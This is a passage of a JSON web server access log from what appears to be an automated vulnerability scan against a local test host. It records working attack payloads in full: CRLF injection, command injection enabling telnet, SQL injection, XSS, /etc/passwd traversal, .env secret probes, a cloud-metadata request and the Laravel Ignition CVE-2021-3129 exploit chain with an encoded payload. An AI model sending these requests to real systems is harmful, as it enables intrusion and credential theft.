njection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.144","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\x22R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\x22))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.134","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999))) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.131","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.131","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img.php?f=/./etc/./passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.131","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/includes/configure.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.130","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\x22;user|s.\x221337\x22; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.114","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22AA\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.115","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"{\x22get_user_login_cmd\x22:{\x22name\x22:\x22admin\x22,\x22password\x22:\x2221232f297a57a5a743894a0e4a801fc3\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.116","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.115","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hp/device/DeviceInformation/View HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.109","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /haproxy-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.110","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.106","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.106","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/29N5Ehpbqnze5SzuXFeZbc9Yrcz.svg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.103","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.101","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /express-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.105","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:25 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.075","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:25 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22phar://../storage/logs/laravel.log/test.txt\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:25 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph_cms HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"8.397","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:28 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:29 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:29 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-devtools HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground-html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/console 